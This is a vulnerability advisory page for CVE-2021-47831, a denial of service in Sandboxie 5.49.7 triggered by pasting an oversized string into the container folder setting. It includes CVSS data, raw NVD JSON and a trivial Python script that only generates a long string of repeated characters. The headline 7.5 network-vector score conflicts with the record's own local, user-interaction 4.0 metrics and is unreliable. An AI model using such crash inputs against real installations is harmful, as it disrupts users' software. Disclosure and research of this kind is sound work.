Security Vulnerability Report
CVE-2021-47831 CVSS 7.5 HIGH

CVE-2021-47831

Published: 2026-01-16 19:16:08
Last Modified: 2026-04-15 00:35:42

Description

Sandboxie 5.49.7 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the container folder input field. Attackers can paste a large buffer of repeated characters into the Sandbox container folder setting to trigger an application crash.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Sandboxie < 5.49.7
Sandboxie 5.49.7 (affected version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2021-47831 PoC - Sandboxie Buffer Overflow DoS
# This PoC demonstrates the buffer overflow vulnerability in Sandboxie container folder input
# Note: This is for educational and security research purposes only
import sys


def generate_poc_payload(length=10000):
    """
    Generate a large payload of repeated characters
    to trigger buffer overflow in Sandboxie container folder input field
    """
    return 'A' * length


def simulate_attack():
    """
    Simulate the attack process:
    1. Open Sandboxie settings
    2. Navigate to container folder setting
    3. Paste large buffer into input field
    4. Application crashes due to buffer overflow
    """
    payload = generate_poc_payload(10000)
    print(f"[+] Generated payload with {len(payload)} characters")
    print(f"[+] Payload preview: {payload[:100]}...")
    print("[+] Attack simulation complete")
    print("[-] Target application would crash due to buffer overflow")
    return payload


if __name__ == "__main__":
    print("CVE-2021-47831 Sandboxie Buffer Overflow PoC")
    print("=" * 50)
    simulate_attack()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47831", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:08.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandboxie 5.49.7 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the container folder input field. Attackers can paste a large buffer of repeated characters into the Sandbox container folder setting to trigger an application crash."}, {"lang": "es", "value": "Sandboxie 5.49.7 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes provocar un fallo en la aplicación desbordando el campo de entrada de la carpeta del contenedor. Los atacantes pueden pegar un búfer grande de caracteres repetidos en la configuración de la carpeta del contenedor de la sandbox para provocar un fallo en la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://sandboxie-plus.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49844", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sandboxie-denial-of-service", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49844", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}